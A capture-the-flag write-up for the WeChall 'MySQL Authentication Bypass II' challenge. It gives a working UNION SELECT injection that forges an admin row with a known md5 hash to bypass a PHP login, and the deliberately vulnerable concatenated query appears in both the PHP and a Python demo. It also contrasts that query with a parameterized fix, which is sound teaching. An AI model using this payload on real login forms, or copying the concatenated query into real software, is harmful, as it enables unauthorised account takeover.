Wechall - MySQL II
MySQL Authentication Bypass II
This one is the same as MySQL1,
but you have to come up with a more advanced injection
to trick this authentication.
Your mission is again: Login yourself as admin.
Again you are given the source code, also as a highlighted version.
Enjoy!
Solution
$password = md5($password);
$query = "SELECT * FROM users WHERE username='$username'";
#############################
### This is the new check ###
if ($result['password'] !== $password) {
    echo GWF_HTML::error('Auth2', $chall->lang('err_password'), false);
    return false;
} # End of the new code ###
#############################
if (strtolower($result['username']) === 'admin') {
    $chall->onChallengeSolved(GWF_Session::getUserID());
}
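The query fetches the row by username alone, and the password stored in that row must equal the md5 of the password that was entered.
So use union select to inject a row whose username is admin and whose password column holds the md5 of 1; entering 1 as the password then succeeds.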
username : ' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b' #
password : 1
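The vulnerable lookup beside a parameterized one, as an added example that is not part of the original post or the challenge source. It uses Python with an in-memory SQLite database in place of PHP and MySQL; the three-column users table, the function names and the stored admin password are assumptions, and the payload's MySQL # comment is swapped for SQLite's -- comment.

```python
import hashlib
import sqlite3

# Payload from the page; SQLite has no '#' comment, so '--' replaces it here.
PAYLOAD = "' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b' #".replace("#", "--")
ADMIN_PASSWORD = "constructed-admin-password"  # constructed sample value


def make_db():
    """Constructed stand-in for the challenge table (column layout assumed)."""
    db = sqlite3.connect(":memory:")
    db.row_factory = sqlite3.Row
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    stored = hashlib.md5(ADMIN_PASSWORD.encode()).hexdigest()
    db.execute("INSERT INTO users VALUES (1, 'admin', ?)", (stored,))
    return db


def check(row, password):
    """The page's 'new check': the row's hash must equal md5(input)."""
    if row is None:
        return None
    if row["password"] != hashlib.md5(password.encode()).hexdigest():
        return None
    return row["username"].lower()


def login_vulnerable(db, username, password):
    # Same shape as the challenge: input is concatenated into the SQL text,
    # so a UNION can supply the whole row, including the hash being checked.
    query = "SELECT * FROM users WHERE username='" + username + "'"
    return check(db.execute(query).fetchone(), password)


def login_hardened(db, username, password):
    # Bound parameter: the input is compared as a value and never parsed as SQL,
    # so only rows actually stored in the table can reach the hash check.
    query = "SELECT * FROM users WHERE username = ?"
    return check(db.execute(query, (username,)).fetchone(), password)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "1"))
    print("hardened:  ", login_hardened(db, PAYLOAD, "1"))
    print("legitimate:", login_hardened(db, "admin", ADMIN_PASSWORD))
```

The hash comparison is identical in both functions; only the way the username reaches the database differs, which is why the check added in this challenge does not help while the query is still built by concatenation.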
This post is licensed under CC BY 4.0 by the author.